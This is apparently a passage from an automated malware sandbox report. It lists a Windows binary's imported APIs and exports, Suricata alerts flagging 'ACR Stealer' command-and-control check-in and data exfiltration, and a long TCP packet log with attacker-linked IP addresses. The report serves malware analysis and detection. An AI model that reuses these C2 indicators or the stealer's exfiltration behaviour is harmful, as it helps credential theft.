CharUpperBuffW, GetClientRect, IsChild, ClientToScreen, SetWindowPlacement, IsIconic, CallNextHookEx, GetMonitorInfoW, ShowWindow, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, SetForegroundWindow, GetWindowTextW, EnableWindow, DestroyWindow, IsDialogMessageW, EndMenu, RegisterClassW, CharNextW, GetWindowThreadProcessId, RedrawWindow, GetDC, GetFocus, SetFocus, EndPaint, ExitWindowsEx, ReleaseDC, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, GetClassLongW, ActivateKeyboardLayout, GetParent, CharToOemBuffA, DrawTextW, SetScrollRange, InsertMenuItemW, PeekMessageA, GetPropW, SetClassLongW, MessageBoxW, MessageBeep, SetPropW, SetRectEmpty, UpdateWindow, RemovePropW, GetSubMenu, MsgWaitForMultipleObjects, DestroyMenu, DestroyIcon, SetWindowsHookExW, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, AdjustWindowRectEx, DrawIcon, IsWindow, EnumThreadWindows, InvalidateRect, GetKeyboardState, DrawFrameControl, ScreenToClient, SendMessageTimeoutW, BringWindowToTop, SetCursor, CreateIcon, CreateMenu, LoadStringW, CharLowerW, SetWindowPos, SetWindowRgn, GetMenuItemCount, RemoveMenu, AppendMenuW, GetSysColorBrush, GetKeyboardLayoutNameW, GetWindowDC, TranslateMessage, DrawTextExW, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, DestroyCursor, ReplyMessage, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, EnableScrollBar, GetSysColor, TrackPopupMenu, DrawIconEx, PostQuitMessage, GetClassNameW, ShowScrollBar, EnableMenuItem, GetIconInfo, GetMessagePos, LoadImageW, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, GetCursorPos, SetCursorPos, HideCaret, GetMenu, GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll	SafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
advapi32.dll	RegSetValueExW, ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, GetUserNameW, RegQueryInfoKeyW, EqualSid, GetTokenInformation, RegCreateKeyExW, SetSecurityDescriptorDacl, RegEnumKeyExW, AdjustTokenPrivileges, RegDeleteKeyW, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, RegDeleteValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, ConvertSidToStringSidW, RegCloseKey, InitializeSecurityDescriptor
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
msvcrt.dll	memcpy
winhttp.dll	WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
kernel32.dll	SetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
ole32.dll	StgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
gdi32.dll	Arc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries

Exports

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4b5e78
__dbk_fcall_wrapper	2	0x410a7c
dbkFCallWrapperAddr	1	0x6d3640

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T21:20:18.977823+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-27T21:20:21.370450+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49732	104.21.2.114	443	TCP
2024-12-27T21:20:21.370450+0100	2052674	ET MALWARE ACR Stealer CnC Checkin Attempt	1	192.168.2.4	49732	104.21.2.114	443	TCP
2024-12-27T21:20:23.609794+0100	2052675	ET MALWARE ACR Stealer Data Exfiltration Attempt M1	1	192.168.2.4	49734	104.21.2.114	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 21:20:06.382348061 CET	49675	443	192.168.2.4	173.222.162.32
Dec 27, 2024 21:20:16.561285973 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:16.561323881 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:16.561412096 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:16.571521997 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:16.571536064 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.018501997 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.018615007 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:18.233560085 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:18.233580112 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.233844042 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.233891964 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:18.238850117 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:18.279329062 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.977832079 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.977854013 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.977870941 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.977906942 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:18.977926016 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:18.977993011 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:18.977993011 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:19.163458109 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:19.163505077 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:19.163536072 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:19.163548946 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:19.163578033 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:19.163738966 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:19.196820021 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:19.196857929 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:19.196887016 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:19.196887016 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:19.196952105 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:19.196952105 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:19.197559118 CET	49730	443	192.168.2.4	23.55.153.106
Dec 27, 2024 21:20:19.197570086 CET	443	49730	23.55.153.106	192.168.2.4
Dec 27, 2024 21:20:19.533237934 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:19.533283949 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:19.533611059 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:19.534147024 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:19.534163952 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:20.751275063 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:20.751373053 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:20.767529964 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:20.767544985 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:20.767785072 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:20.767841101 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:20.771377087 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:20.815337896 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.370450974 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.370510101 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.370520115 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.370554924 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.370603085 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.370620966 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.370629072 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.370642900 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.370673895 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.370680094 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.370829105 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.373075008 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.373136044 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.373163939 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.373236895 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.381556034 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.381647110 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.381654024 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.381730080 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.390012980 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.390059948 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.490468025 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.490526915 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.490542889 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.490566015 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.490588903 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.490602970 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.562491894 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.562546968 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.565973997 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.569000006 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.569008112 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.569081068 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.573493958 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.573544979 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.573549986 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.573590040 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.580966949 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.581156969 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.581163883 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.581202030 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.588572979 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.589329004 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.596055031 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.597213984 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.597219944 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.597261906 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.603476048 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.603574991 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.603642941 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.604552031 CET	49732	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.604564905 CET	443	49732	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.666745901 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.666773081 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:21.666923046 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.667521954 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:21.667537928 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:22.972018957 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:22.972095966 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:22.972584009 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:22.972595930 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:22.972910881 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:22.972915888 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:22.973079920 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:22.973084927 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:22.973160982 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:22.973165035 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:23.609807014 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:23.609867096 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:23.609875917 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:23.609908104 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:23.610012054 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:23.610032082 CET	443	49734	104.21.2.114	192.168.2.4
Dec 27, 2024 21:20:23.610047102 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:23.610080957 CET	49734	443	192.168.2.4	104.21.2.114
Dec 27, 2024 21:20:24.823008060 CET	80	49723	217.20.58.101	192.168.2.4
Dec 27, 2024 21:20:24.823152065 CET	49723	80	192.168.2.4	217.20.58.101
Dec 27, 2024 21:20:24.823460102 CET	49723	80	192.168.2.4	217.20.58.101
Dec 27, 2024 21:20:24.942867041 CET	80	49723	217.20.58.101	192.168.2.4
Dec 27, 2024 21:20:27.460562944 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.460603952 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:27.460707903 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.460983992 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.461004019 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:27.596976042 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.597004890 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:27.597073078 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.621306896 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.621320963 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:27.625940084 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.625976086 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:27.626041889 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.626245975 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.626259089 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:27.703073025 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.703099012 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:27.703310013 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.703537941 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:27.703550100 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.246119022 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.246428013 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.246474981 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.247366905 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.247450113 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.248603106 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.248671055 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.248764992 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.248784065 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.296106100 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.400060892 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.400413036 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.400454044 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.401305914 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.401372910 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.402137041 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.402193069 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.402414083 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.402421951 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.408454895 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.408683062 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.408700943 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.409730911 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.409823895 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.410116911 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.410181046 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.410237074 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.410243988 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.442504883 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.442559004 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.443006992 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.443020105 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.446551085 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.446616888 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.447179079 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.447376966 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.457516909 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.496887922 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:29.496910095 CET	443	49747	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:29.549046040 CET	49747	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.103447914 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.103585958 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.103765965 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.104692936 CET	49744	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.104707003 CET	443	49744	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.277487993 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.277527094 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.277559996 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.277585983 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.277611971 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.277614117 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.277650118 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.277664900 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.277827978 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.290661097 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.295007944 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.295078993 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.295105934 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.308939934 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.309130907 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.309194088 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.309223890 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.309326887 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.309973955 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.310862064 CET	49745	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.310873985 CET	443	49745	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.351505995 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.396981001 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.446052074 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.461498976 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.487987041 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.488049984 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.488087893 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.491957903 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.492019892 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.492039919 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.500133038 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.500188112 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.500207901 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.515067101 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.515125990 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.515152931 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.524413109 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.524466038 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.524488926 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.533334970 CET	443	49746	172.217.21.36	192.168.2.4
Dec 27, 2024 21:20:30.533385038 CET	49746	443	192.168.2.4	172.217.21.36
Dec 27, 2024 21:20:30.533415079 CET	443	49746	172.217.21.36	192.168.2.4
